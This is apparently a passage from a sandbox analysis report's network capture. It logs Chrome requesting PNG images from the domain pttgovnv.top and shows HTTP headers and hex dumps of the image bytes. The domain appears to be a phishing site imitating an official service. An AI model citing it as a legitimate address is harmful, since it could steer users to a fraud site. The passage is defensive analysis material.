7b 1f af fd bc 09 38 8f 89 93 eb 6f 87 9f 15 79 d9 bc 2d cf fb 8a c8
          Data Ascii: ixd%xDggo!mKRVaF__%Ck9/#g3ILj/R>KItyTo5)cn}@Ro~OKK7o>o@#nvij'yD-[zCUsm9^w:<!S[u{{8oy-
          2024-09-01 22:25:26 UTC1369INData Raw: 7e f3 fb 2c 8d 17 e2 4c 78 6b b7 3b 39 e7 92 33 be 97 d1 70 27 00 b4 da 17 43 c7 ce e8 12 2b da 65 9a 4a 4f 2c 70 5b dc 3a ed 6c 51 af ff 7a 59 46 58 7c c2 86 bf f2 b4 ca b9 41 ae 4d fc 8f 91 4b 36 ea 89 d9 1c 03 6d 12 bc 4e 5c 23 04 aa 7e 8a fd d6 11 6d 21 aa d6 00 e7 9d e0 df fc 1b 77 cc 54 ae 90 30 66 41 e5 36 6c ec 5b fc 05 38 1d 3f 57 45 9c d4 80 a4 5e f9 64 de 7d 5a 11 27 0f 94 ee be d7 df 27 a9 35 1d e9 00 16 1b 6d 9d 33 01 2b dd 3a 36 f0 6a be 30 a7 79 60 9f 0c ce 28 ed b4 3f bb ed ef 36 db dc 30 f4 3c 73 62 bf db f2 b6 2b f7 30 8d f4 ef 87 3e e6 64 89 30 04 ac a6 42 9c 8e 7b d3 e2 a8 76 e7 36 17 49 c8 7e 83 91 17 e4 b2 df 11 8b 64 70 26 c9 a3 36 9d eb 8b 96 3d 60 f1 56 29 67 ab 9c bb bd 9d 3e af dd dc c0 ad 71 61 be dd 94 3b 50 15 5b 2e ab 14 3a
          Data Ascii: ~,Lxk;93p'C+eJO,p[:lQzYFX|AMK6mN\#~m!wT0fA6l[8?WE^d}Z''5m3+:6j0y`(?60<sb+0>d0B{v6I~dp&6=`V)g>qa;P[.:
          2024-09-01 22:25:26 UTC1369INData Raw: b6 7e af be 8f f7 5c 61 68 c1 ed e9 e2 bd 05 03 f7 94 2b dc 8b 09 7a 4e ef 03 d1 c2 5c d4 2f 99 b3 3e 66 be 5c de 32 ec eb 98 44 9c 6c 56 15 21 ce 9c c0 3b ec 13 89 b3 14 b5 86 82 68 61 cb ed 16 d5 95 1b 32 b7 ef 1e 3b a9 a0 b3 6c 6b a9 16 b6 dc 47 88 ab 76 4b 2a fc f8 9d 82 fa b2 e3 91 fa 3e a9 8d 18 1d e0 ec 31 2e be 00 e7 dd e5 d4 eb 45 76 7e 2b f8 0d 75 0c 98 9f 31 69 95 12 72 05 09 e7 2d 77 c7 b3 92 c2 8c 0f 8b 6c 7f 28 f8 92 69 1a 90 ab 7d df fa 4a 24 e3 8b ef eb 73 6f 12 39 ff 4f 82 bd 3e da 52 77 d1 1d 26 48 7d 40 52 1b bf 1d 6f b9 92 a2 cf 69 a2 38 f3 fe 22 57 17 aa d2 6c d1 1b e9 a3 a0 c2 e1 4d 4b 86 f4 8a 5b 29 39 ee b5 44 16 db d6 bd e8 dc 96 b7 84 b9 dc 69 93 b3 be 1a 4f d8 3a 72 ad 55 10 e2 10 de 4a 66 6c d6 9f d4 a1 35 35 bc f1 3e 46 da 8c
          Data Ascii: ~\ah+zN\/>f\2DlV!;ha2;lkGvK*>1.Ev~+u1ir-wl(i}J$so9O>Rw&H}@Roi8"WlMK[)9DiO:rUJfl55>F
          2024-09-01 22:25:26 UTC1369INData Raw: b4 19 a7 da 52 d2 51 6c c0 b9 ae 4d 69 1e 4f af eb a7 5b 55 b7 a9 de 43 5c ae 96 a5 2e 3b 7b 35 9f d6 ac ff bf d5 ec d3 64 1d 0e f6 df 62 8f 29 ca b1 94 9b 9e 88 e6 7d 89 fd 50 95 9f 18 e6 64 d6 ff bc c8 c1 35 92 3a fc f2 90 e2 bd 25 6b 69 3b be af 3a f7 c5 e1 57 c3 7d 49 59 55 c2 2f 28 c7 b7 d7 5f 8b 67 0c 61 28 16 19 61 4e 16 fc 79 1c 5d a3 19 5f 86 f6 8b bc fa 0d 77 e9 ae 5c c7 cc f6 87 c5 99 fd 81 cc 16 be c9 12 a1 20 7f 2c 21 2e a6 65 8f c2 9c 68 35 c1 ae f2 71 bd 66 2d 28 dc 60 03 d9 bd ae e8 7c af 99 b6 98 2e cc 19 fc ea 67 92 43 ce ee 78 a0 e1 68 b7 e8 c0 1a 13 dc 9e 91 d4 91 75 c3 ba e9 ca 16 16 ce 98 50 95 bb 27 95 3a 12 6a 1f 38 d5 d6 52 56 a5 fb 37 6c 18 4a bd d4 19 df 92 57 79 c2 9c ac fa b4 c8 ac 8f 46 ab 3f e7 d9 f7 bc a4 d6 7f b3 78 77 ef
          Data Ascii: RQlMiO[UC\.;{5db)}Pd5:%ki;:W}IYU/(_ga(aNy]_w\ ,!.eh5qf-(`|.gCxhuP':j8RV7lJWyF?xw
          2024-09-01 22:25:26 UTC1369INData Raw: 98 30 2d 44 51 8e a7 30 fb bf 99 97 a9 81 fc f6 2b e1 6f 3b f3 16 71 de f1 2b 91 73 6f 8a dc 0d e7 9c dc 53 3f fb 74 f4 2c 8e ab 6a 61 42 96 37 8e 4d c7 bd a5 2f 57 3d 14 4f 80 cb 3c 7e b5 75 4c c7 d4 bd eb 71 71 12 9f 4b 07 c5 c8 f7 39 b5 d5 dd 5e ed ba cd 1d e0 7e 69 bf 74 c7 d6 03 38 a2 14 af 81 0d 51 da 1a b1 22 c0 cd 96 e8 38 b5 b8 02 15 41 2e eb 33 ea a1 9e 0e 29 3c 56 70 45 83 ad 68 51 4a 89 32 87 38 7d 7d 13 ec f6 06 a0 93 19 0e 86 f9 5e 31 5a 64 c1 f7 cd 91 f9 b9 f8 b6 a5 9e 5a a2 9a ae 0a 77 bb be df 70 4c 96 8a 86 36 0d 42 a5 5c df d4 86 46 39 ef 86 74 50 4c 07 47 7d 8f 68 37 e8 c8 89 3e de 56 e7 ba c1 6d 9e 1b 06 e5 92 af 14 db de df b5 9f f1 9d b1 6d 7e a9 f6 8b ed a2 6c b3 e1 e1 1e 9f 37 d3 ae 3e 2d 17 d2 16 c7 58 35 5b 7a 44 83 5c b7 14 ee
          Data Ascii: 0-DQ0+o;q+soS?t,jaB7M/W=O<~uLqqK9^~it8Q"8A.3)<VpEhQJ28}}^1ZdZwpL6B\F9tPLG}h7>Vmm~l7>-X5[zD\


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          86192.168.2.449831104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/44.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 17267
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4373-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVQoahIt7BtyIHukujktxWZGNlXvSRd7y0nt%2FzyFhaxGO%2FX6p%2F2U9R4WjG1Hxe46IOjvxNrFo0xwDUmqwqwGenLXrvVXrCwwIBLGUTXNgeknaBTOj4W4DAO%2Beeb827Y%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e6f2a7cff-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 9b 00 00 00 fe 08 06 00 00 00 ec d6 a8 a5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 43 08 49 44 41 54 78 5e ed 9d 07 78 5d 47 99 fe e9 b0 0b 2c 0b 5b 80 5d 76 61 97 0d a1 06 96 14 20 40 0a 81 40 0a a1 84 c0 d2 61 29 0b fc 69 09 65 e9 2d f4 b2 0b 59 fa 12 ca 12 42 e2 f4 84 f4 1e 77 5b 96 64 c9 2a 96 6d b9 48 2e b2 6c 4b b6 6c c9 b6 e4 99 ff f7 7e 67 ae 72 75 35 f7 de 99 73 cf 91 ee 95 de 5f 9e ef b1 e3 7b ce 9c 73 e6 cc 99 77 ca 37 df 3c c0 12 42 08 21 39 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92
          Data Ascii: PNGIHDRsRGBgAMAapHYsodCIDATx^x]G,[]va @@a)ie-YBw[d*mH.lKl~gru5s_{sw7<B!9C!;B!C!;B!C!;B!C!
          2024-09-01 22:25:26 UTC1369INData Raw: 0f 1d 9a b0 db 46 0f 4f da 76 b1 81 b1 71 cd 2b 42 48 3c 73 66 18 cd 4c 8c 5a b3 ec 85 d6 ac 7e b3 88 ce 5d f2 0f d2 db 21 55 69 de 73 c0 1e 73 53 a7 7d d8 65 cd f6 01 7f f4 db 03 4b ec 41 72 ac cf 1e 2c f6 10 b1 3f 5b d0 6a ff fa ea 36 fb 82 db ba ed 67 5a b7 da 7b 07 46 b4 02 cf 02 69 56 d8 df f4 ee b2 ff 7c fd 1a fb 08 b9 ce c3 17 b4 c8 9f b0 56 bd ee e3 e5 ba df e9 d8 e1 8e 4e c7 f9 ab fa ec df 5e d5 66 1f 75 45 ab 7d 74 91 3d e6 ca d5 f6 44 79 a6 d6 a1 51 77 24 21 24 94 39 35 67 63 76 5c 61 cd c2 a3 ad 59 f4 6c 6b 56 9c 62 4d fb 7b ac d9 f4 23 e9 f5 5c 6b cd f0 72 6b 47 37 5a 3b be cf 1d 4d 76 8c 1d b6 ff 72 c3 1a fb 80 4b 57 89 f9 85 c6 6b 38 b6 aa 49 9a 7f 48 ec 21 72 ce 3f 5c db 6e df b2 b8 57 85 a7 96 1e cf 0f bb 07 92 74 0b f7 ec b9 ee 43 c4 6e
          Data Ascii: FOvq+BH<sfLZ~]!UissS}eKAr,?[j6gZ{FiV|VN^fuE}t=DyQw$!$95gcv\aYlkVbM{#\krkG7Z;MvrKWk8IH!r?\nWtCn
          2024-09-01 22:25:26 UTC1369INData Raw: 1b 04 d4 4c cb f8 11 63 bf db b9 c3 3e fc 32 4f da e5 4c 84 e9 43 2b b7 b8 14 12 90 4e bd 88 cd cb ee a0 d8 10 12 c3 dc 17 9b d1 de 24 1a 40 a1 d7 a2 43 5f 62 a8 f4 e1 b6 0c ef b4 e5 27 5a b3 f2 95 89 23 00 86 d3 26 45 41 8e 5f 79 9a 35 7b 5b 5c 6a e5 31 13 63 3a 4c 66 ba 3e 9a 08 5b b5 9e 0e 7e c7 42 d1 6d 7f 90 93 67 67 68 ed f5 0b 37 cc 88 d8 14 f8 74 4b 7f d2 c3 f1 5d c3 63 a5 93 fc 31 62 f3 50 11 b6 bf b9 6a b5 da df 4e 5a 9b da 53 ae 6d d7 de d6 dd 3b a6 06 65 55 b1 b9 3a 2c fd 87 5f de a2 f7 82 61 3d 18 e6 92 60 58 74 fa 9c 1b 3b ec 27 9b fb 32 d9 ee 80 90 b9 c2 bc 70 10 30 23 ed 52 b1 17 89 08 26 f8 97 bf 58 fe 7c 9e eb 8d 54 9a 77 91 df da df e9 52 0a c3 1c 58 2f 3d 9d b3 13 07 81 6a ce 04 b8 7e e7 47 66 c5 81 60 a6 c5 66 f0 e0 b8 7d 14 e6 71 7c
          Data Ascii: Lc>2OLC+N$@C_b'Z#&EA_y5{[\j1c:Lf>[~Bmggh7tK]c1bPjNZSm;eU:,_a=`Xt;'2p0#R&X|TwRX/=j~Gf`f}q|
          2024-09-01 22:25:26 UTC1369INData Raw: d5 33 24 36 1d c3 63 f6 a8 1b aa 37 20 a6 98 dc 57 e9 7c c7 e1 08 b1 49 13 bb 2c 46 6c 5e 7e 67 8f 3b 8b 10 12 c2 ac 8b cd f6 d1 c3 f6 ab ed db 92 98 57 21 15 5f c1 2e 6d b6 7f dc 1c b7 aa bf 80 d9 7c 51 d2 73 99 5c 67 73 be fc 63 7d 84 fe 37 6d ef 2a 12 1b 11 43 04 03 35 d9 8f fb 63 2a e4 d5 f7 86 8b cd 17 22 c5 06 f3 69 68 e5 7f 7d cd f6 c4 5d 39 46 68 c4 10 d3 6c a4 c4 01 24 6f b1 39 20 62 83 18 6a be f4 4a 8d 62 43 48 1c b3 2a 36 08 21 ff 17 57 b4 c6 89 4c c1 a4 f2 fa f9 ba f2 db 06 54 04 d1 02 d6 7e 3a e9 39 68 a5 2e 82 83 7d 6c ea 00 dd e1 b3 10 65 00 c3 78 4d a7 ab 8b 76 d6 40 6c ce 0e 15 1b b1 27 5c d3 6e 9f 7f 4b 97 3d f6 d6 c4 8e bb b5 5b ed f8 82 dd d6 6d 4f 70 f6 3c 39 ee d1 57 ca 7b 85 d7 59 9a 77 2b f6 ce a5 d3 37 4f 8b 11 9b d3 ee 88 17 83
          Data Ascii: 3$6c7 W|I,Fl^~g;W!_.m|Qs\gsc}7m*C5c*"ih}]9Fhl$o9 bjJbCH*6!WLT~:9h.}lexMv@l'\nK=[mOp<9W{Yw+7O
          2024-09-01 22:25:26 UTC1369INData Raw: e6 d0 a0 35 4b 8e 4d 5c ac 8f f8 dd 7f e1 0c f1 fc 9b 3d 6e e0 ce 4e b9 3d 3c 1e 18 c4 e6 95 a1 62 23 79 fd d9 d6 ad da b3 84 0d 57 30 fc 8e 89 f6 3c 1c 37 20 36 79 ae 83 81 d8 fc 55 b0 d8 cc d0 8e ae 84 cc 11 6a 9e b3 c1 d8 3f 7a 38 4f ac e6 25 24 15 d6 93 ae 6e 8f de 16 c0 07 2a ca d7 22 d4 0a 04 47 ec fb 5d e9 c3 d6 d4 0b 66 68 b1 35 2b 4e b1 66 cc bf a8 11 55 f7 b7 3a 76 4c 8a ec 34 13 d1 b8 5a 7a 11 a1 24 62 b3 2e 58 6c be dc be cd 9d 39 7b c4 88 4d 1a 6f 31 15 1b e9 7d fb d2 2b 35 0c 05 13 42 c2 a9 59 6c 0a 5c 25 15 9d ae a9 f1 7c 98 c5 f6 9c 1b 3b ec c1 89 da 5b bd ab 87 46 75 f1 27 2a c2 27 5c db d6 f0 3b 22 9a 5d b7 95 15 1a b0 f3 e0 b8 0e 65 4d 99 ab 29 98 e4 c1 d1 37 76 ea 7e 40 a1 40 6c 4e 8f 10 9b af 50 6c a6 18 c5 86 90 38 32 13 1b 54 5e 0b
          Data Ascii: 5KM\=nN=<b#yW0<7 6yUj?z8O%$n*"G]fh5+NfU:vL4Zz$b.Xl9{Mo1}+5BYl\%|;[Fu'*'\;"]eM)7v~@@lNPl82T^
          2024-09-01 22:25:26 UTC1369INData Raw: d8 15 c0 30 5e 8f 54 6a b1 2d f4 27 5e d3 66 0f 64 30 04 18 2b 36 b1 1b dd e5 4d fb f0 68 d8 bd 57 b1 a3 e5 fd 23 32 41 29 bf 2e 8a 2c 9e da 44 80 b0 f8 b3 d6 86 01 21 73 81 59 15 1b 8c 8f a3 65 79 56 61 13 2f b4 3e 3d 1f 2d 26 6c f1 d1 7e ba a5 5f e7 72 10 c2 3e 2b 30 24 73 a5 88 0e c6 e9 31 3c 35 59 c1 e0 4f b9 a7 87 5c d6 62 9f 7c 6d bb 3d f3 ae 75 f6 53 72 7d 0c ed a1 37 72 fb f6 bd 1a ed fa 8f 9b f6 a8 17 dd 8f d6 0e d8 6f 48 6f ed 73 ab b7 da 8f ad ea d3 f9 97 37 2f ea d5 30 33 98 2b 7a b1 b4 76 8f b9 b1 43 5b be d8 3a 1b 22 f3 a8 05 91 ad 67 b9 9f 4f 48 af 26 0b 30 dc 13 3c 74 27 c7 d4 9b d8 a0 ec fc 7c dd ce ca bd e3 10 93 32 b7 c0 e3 b1 86 a1 4d 5d 73 13 f3 7e 3c 06 27 82 5a 36 8c 23 64 ae 30 ab 62 53 00 15 df 7d 22 22 a7 dc 51 a5 f2 c3 6f 52 e1
          Data Ascii: 0^Tj-'^fd0+6MhW#2A).,D!sYeyVa/>=-&l~_r>+0$s1<5YO\b|m=uSr}7roHos7/03+zvC[:"gOH&0<t'|2M]s~<'Z6#d0bS}""QoR
          2024-09-01 22:25:26 UTC1369INData Raw: 66 dd 17 93 f7 e1 7b 4f 05 5b f4 4c e9 e1 bc 41 1a 31 dc 84 8c 90 46 25 7b b1 e9 fd 9e 54 0e d2 a3 f1 55 1a f5 66 a8 c4 06 ae 77 77 4e 66 1a ed 01 2f 7b a1 ff dd 94 1a 7a a4 bb 6e 73 67 12 42 1a 8d 4c c5 06 73 21 66 f9 4b fd 95 45 3d 1a 7a 5f 9d 1f 65 ef 66 96 30 c3 2b e4 3d 1c 33 fd bd f8 0c 0d 83 be 5f ba 33 09 21 8d 46 b6 62 b3 f9 c7 52 29 54 19 7f af 27 43 0f 6c d5 59 a2 35 87 dd 13 90 99 c4 f4 5f 9c 08 be ef dd 4c 33 79 57 eb be e8 ce 24 84 34 1a 19 8a 8d b1 a6 fb 82 88 ca a3 0e 0c f7 ba f6 d3 7a ef 64 e6 31 eb bf 1c 51 5e 9e 2d bd d0 0f b9 33 09 21 8d 46 76 62 23 bd 03 d3 fc 9a a4 b7 e0 ad 2c ea d0 e0 95 36 b4 c8 3d 00 99 69 12 e7 80 08 b1 e9 f8 a0 3b 93 10 d2 68 64 26 36 66 e2 80 35 cb 5e 24 95 47 9d 7a a0 4d 31 b9 c7 85 47 69 cb 9a cc 1e 14 1b 42
          Data Ascii: f{O[LA1F%{TUfwwNf/{znsgBLs!fKE=z_ef0+=3_3!FbR)T'ClY5_L3yW$4zd1Q^-3!Fvb#,6=i;hd&6f5^$GzM1GiB
          2024-09-01 22:25:26 UTC1369INData Raw: 15 c6 e4 f0 48 96 05 d4 6b 92 07 10 9d d1 cd ee ca e1 d4 22 36 e8 59 6a 0b 2d ab 8a 5c 2b 16 e9 e5 1c 58 ef ae 90 0e 15 c0 a5 c7 cd 40 be 17 19 be b9 55 67 eb dc 41 0c 66 5f 8b 9c 5f 65 3f 21 f4 7a a4 41 51 8c 0e 3f 6a de 7b 8e 4f 63 9a f7 c7 eb 3c 5b 4d 98 71 a9 98 bf 99 7d de a3 8c a2 51 53 d4 93 d7 f9 9e 85 4f f5 1f 5f 30 d4 0f 22 54 69 c1 37 af a3 11 79 96 25 dc 23 ea e2 ad bf 77 57 cd 0f 8a 4d 29 28 b0 d8 82 38 e4 05 e3 45 ad 79 af 35 29 26 6e cd 68 af b4 7c 5f e6 4f b7 d4 f0 c1 47 44 a7 d6 09 4f 8c 3d 6b 45 9e 51 65 5c c9 90 0f 2b e5 59 06 6f 92 bc 08 1f 8e 4a 23 36 da 1b dc fc 93 a4 b7 e7 3d ae 06 c3 73 60 9e 2e a5 03 81 0a 8d ee 3c 3a 03 79 5e 6a 28 af 18 b6 19 0b 17 fd a4 b1 53 a5 9c e3 77 a9 68 f5 bb 90 ca d6 74 7d d4 7f 5c ad 86 bc 87 60 1e 2e
          Data Ascii: Hk"6Yj-\+X@UgAf__e?!zAQ?j{Oc<[Mq}QSO_0"Ti7y%#wWM)(8Ey5)&nh|_OGDO=kEQe\+YoJ#6=s`.<:y^j(Swht}\`.
          2024-09-01 22:25:26 UTC1369INData Raw: 26 76 5f e0 ee ba 0a a8 4c b6 5e 22 e7 85 16 36 79 76 7c bc f8 00 4b d0 56 5f f0 8b 96 42 87 95 f0 ce f3 a5 12 ea b9 82 35 05 be 74 bc 26 f7 88 f5 1f 91 6e a6 58 ad ae 93 a2 85 61 b6 10 13 71 ad 44 4d 62 03 61 c7 fa 87 50 67 04 84 b0 c1 c7 16 2c c8 62 92 af 95 7a c2 49 ef 57 7a 54 d5 de 2b 7e 47 2b fa 60 fa 89 57 5d 40 b9 4a 2a 98 d0 32 d4 f2 3a 9c 95 9c 5c 86 d4 62 83 88 12 d1 79 7f 9e 9c 1b 91 f7 2b 5f 21 27 96 9f f7 d3 9e 40 ec 48 0a fe 4c e1 e2 ab d1 1a e0 65 18 9a f7 c5 16 20 36 ea 46 8d 3c f5 9d 5f 6a 5a 37 48 a3 35 a0 6e 28 45 cb 2b 84 36 e6 39 f6 f7 b8 b3 6b 67 fe 89 0d 4c 2a 5b b4 16 43 51 0f 2b ed 39 78 d2 f2 19 c6 7f 8b ba b6 58 bb 11 55 49 4b f7 d8 4e 04 0e b3 60 7c 36 b4 45 04 c3 04 e2 e0 6d ee ec 78 74 3e 21 b4 82 aa 92 cf a9 c5 06 bd cd 2d
          Data Ascii: &v_L^"6yv|KV_B5t&nXaqDMbaPg,bzIWzT+~G+`W]@J*2:\by+_!'@HLe 6F<_jZ7H5n(E+69kgL*[CQ+9xXUIKN`|6Emxt>!-
          2024-09-01 22:25:26 UTC1369INData Raw: bc 8e b0 33 60 00 d1 62 23 bd 3f 79 10 77 76 7a 4c db bb fc e9 97 1a ee ad 24 e2 71 ae 20 74 ff d8 d6 a4 e5 8e bc ec be 40 3d 13 f5 3d a3 9c c4 34 e4 50 59 0f 2d 75 09 fb 89 12 9b e5 d5 bd db 42 d0 2d 35 7c e9 97 1a ee bf 4c af 32 99 e7 08 c9 0b 39 26 74 99 43 28 e8 61 62 13 bc 60 91 a8 20 36 83 b7 07 a6 23 cf d1 f6 0e 77 56 36 24 8e 09 01 f3 bd c8 67 34 d2 53 b8 5a 97 32 8b 62 23 85 a9 5e 63 a3 05 90 59 28 f3 e6 b3 91 79 2e d5 70 74 21 27 f2 d0 97 66 a9 35 bf c6 9d 55 5f 44 8b 8d b4 8a b3 40 87 42 7d e9 97 da 4c 88 0d 86 96 b0 93 67 ff af ad 6e 8e 85 32 85 de a1 e6 4b e0 b7 e4 b3 ac c5 06 f3 9c 19 a0 0b 3c 7d e9 97 9a 8a cd f7 dd 59 53 d1 e1 ca 90 bc 41 5d b4 f9 7f dc 59 d9 11 ee cd 25 56 49 6c fa b1 68 3c a4 87 24 cf 81 e8 24 58 84 8a a5 04 19 98 19 c1
          Data Ascii: 3`b#?ywvzL$q t@==4PY-uB-5|L29&tC(ab` 6#wV6$g4SZ2b#^cY(y.pt!'f5U_D@B}Lgn2K<}YSA]Y%VIlh<$$X


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          87192.168.2.449830172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/47.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 22730
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"58ca-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygJU%2B51LgaPbhFQRKwPOuIZZc2WeHDfhxTl3D165mpRXPIZ2xqYUS6ZRxPsyfWFDq%2FVYCK8DVLlip5uHwQdxrwmHVHZg0Cm8Kusyb1wgk%2BmGUboV3J3bkE11dkY37M4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e88c1c343-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 58 57 49 44 41 54 78 da ec bd 0b 78 1b e7 79 e7 fb cd 05 03 0c 40 12 24 05 89 ba d1 a4 dd 24 72 1c db a4 e2 c6 71 62 a5 62 da 26 f5 ba 49 c4 34 49 63 e7 62 d3 9b 38 69 9b 36 96 db ee 49 da 93 1e d1 bb 39 db ee d3 9e b5 ec ee d3 cd 73 ec 56 b4 93 ad 9d cb 49 a4 b4 4d d5 34 5d 53 b1 95 5a be 89 f4 55 92 25 8b 14 75 a3 08 e2 42 02 98 01 e6 f2 9d ef 1b 0e 48 10 04 49 90 04 71 21 ff bf 47 a3 01 07 83 99 c1 cc 60 e6 37 ef fb 5d 04 4a 29 01 00 00 00 00 00 b5 85 88 5d 00 00 00 00 00 00 89
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<XWIDATxxy@$$rqbb&I4Icb8i6I9sVIM4]SZU%uBHIq!G`7]J)]
          2024-09-01 22:25:26 UTC1369INData Raw: 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00 00 00 00 00 20 71 00 00 00 00 00 00 12 07 00 00 00 00 00 89 03 00 00 00 00 00 90 38 00 00 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00 00 00 00 00 20 71 00 00 00 00 00 00 12 07 00 00 00 00 00 89 03 00 00 00 00 00 90 38 00 00 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00
          Data Ascii: H@$@$ q8H@$@$ q8H@$@$
          2024-09-01 22:25:26 UTC1369INData Raw: 53 6c 39 eb 3a f6 dd 1b fe af 54 4a fc 52 22 29 fa 6d 9b 34 e5 bf ef f7 d1 38 1b 82 49 8d 10 2e 71 7c 9b 36 04 05 55 ca 4b d8 33 c1 72 84 4e 92 68 38 9d 11 3e fe a1 2f 0d 0c 2f 53 28 3b 7d 75 8d 8f 4a b2 7c 13 3b 85 b5 97 9e 4f f2 ef a9 85 1a ed e9 4a 1c 6c 5b c2 17 c3 42 c8 30 c9 20 fb b3 8b 49 5c 0c 67 0d e0 dc 79 e7 1d 3c 52 bb e2 22 06 4f 3c f1 64 3f f6 26 00 a0 52 20 9d 5a c3 30 21 eb 73 d3 86 0f 26 13 12 61 92 15 6e 68 30 43 1e c5 56 cd 8c ae 4d 26 14 de ec 47 6b bd 9f 44 b6 86 e8 d7 d8 eb af b1 f9 b9 d0 f4 bb c3 00 5b c6 50 31 eb 9a 98 14 4f b1 e5 7f 6e be f7 7d 5e fa a7 6c f4 a1 9c 49 6a 52 a3 7f d6 10 10 9e c9 9d 2f 63 08 6c 70 44 93 8b 1f 8f 9e 15 25 71 6e 19 c0 ae 9c 21 a8 27 62 c4 eb af d3 64 c5 a7 3a e5 e2 6c 2b c3 d7 6b 59 24 7e fe 8a 10 4c
          Data Ascii: Sl9:TJR")m48I.q|6UK3rNh8>//S(;}uJ|;OJl[B0 I\gy<R"O<d?&R Z0!s&anh0CVM&GkD[P1On}^lIjR/clpD%qn!'bd:l+kY$~L
